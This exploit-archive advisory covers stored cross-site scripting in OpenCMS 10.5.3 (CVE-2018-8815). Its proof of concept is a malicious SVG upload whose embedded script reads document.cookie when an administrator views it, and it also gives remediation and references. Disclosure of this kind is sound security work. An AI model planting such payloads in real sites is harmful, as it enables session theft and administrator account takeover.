Menu

Search for hundreds of thousands of exploits

"OpenCMS 10.5.3 - Cross-Site Scripting"

Author

Exploit author

"Sureshbabu Narvaneni"

Platform

Exploit platform

php

Release date

Exploit published date

2018-04-02

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
# Exploit Title: OpenCMS 10.5.3 Stored Cross Site Scripting Vulnerability
# Google Dork: N/A
# Date: 02-04-2018
#######################################
# Exploit Author: Sureshbabu Narvaneni
# Author Blog : http://nullnews.in
# Vendor Homepage: http://www.opencms.org/en/
# Software Link: http://www.opencms.org/en/modules/downloads/begindownload.html?id=a7747cd0-b27b-11e7-8299-7fde8b0295e1
# Affected Version: 10.5.3
# Category: WebApps
# Tested on: Ubuntu 14.04 x86_64/Kali Linux 4.12 i686
# CVE : CVE-2018-8815

1. Vendor Description:

OpenCms from Alkacon Software is a professional, easy to use website
content management system. OpenCms helps content managers worldwide to
create and maintain beautiful websites fast and efficiently.

2. Technical Description:

Cross-site scripting (XSS) vulnerability in the gallery function in Alkacon
OpenCMS 10.5.3 allows remote attackers to inject arbitrary web script or
HTML via a malicious SVG image.

3. Proof Of Concept:

a) Login as user who is having Gallery Editor role.
b) Navigate to gallery and upload below svg file.

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "
http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
    <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"
stroke="#004400"/>
    <script type="text/javascript">
      alert(document.cookie);
    </script>
</svg>
c) Once other user who is having Root Administrator permissions visited the
image link or viewed the uploaded svg image the script get executed.

4. Solution:

Upgrade to latest release.
http://www.opencms.org/en/home/news.html

5. Reference:
https://github.com/alkacon/opencms-core/issues/587
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-8815
Release Date Title Type Platform Author
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "Bakeshop Online Ordering System 1.0 - 'Owner' Persistent Cross-site scripting" webapps multiple "Parshwa Bhavsar"
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
Release Date Title Type Platform Author
2018-09-27 "iWay Data Quality Suite Web Console 10.6.1.ga - XML External Entity Injection" webapps windows "Sureshbabu Narvaneni"
2018-04-24 "Open-AudIT 2.1 - CSV Macro Injection" webapps windows "Sureshbabu Narvaneni"
2018-04-18 "Joomla! Component JS Jobs 1.2.0 - Cross-Site Request Forgery" webapps php "Sureshbabu Narvaneni"
2018-04-17 "Joomla! Component jDownloads 3.2.58 - Cross Site Scripting" webapps php "Sureshbabu Narvaneni"
2018-04-09 "WolfCMS 0.8.3.1 - Cross-Site Request Forgery" webapps php "Sureshbabu Narvaneni"
2018-04-09 "WolfCMS 0.8.3.1 - Open Redirection" webapps php "Sureshbabu Narvaneni"
2018-04-05 "Joomla! Component JS Jobs 1.2.0 - Cross-Site Scripting" webapps php "Sureshbabu Narvaneni"
2018-04-05 "GetSimple CMS 3.3.13 - Cross-Site Scripting" webapps php "Sureshbabu Narvaneni"
2018-04-02 "OpenCMS 10.5.3 - Cross-Site Request Forgery" webapps php "Sureshbabu Narvaneni"
2018-04-02 "OpenCMS 10.5.3 - Cross-Site Scripting" webapps php "Sureshbabu Narvaneni"
2018-03-30 "Joomla! Component AcySMS 3.5.0 - CSV Macro Injection" webapps php "Sureshbabu Narvaneni"
2018-03-30 "Joomla! Component Acymailing Starter 5.9.5 - CSV Macro Injection" webapps php "Sureshbabu Narvaneni"
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.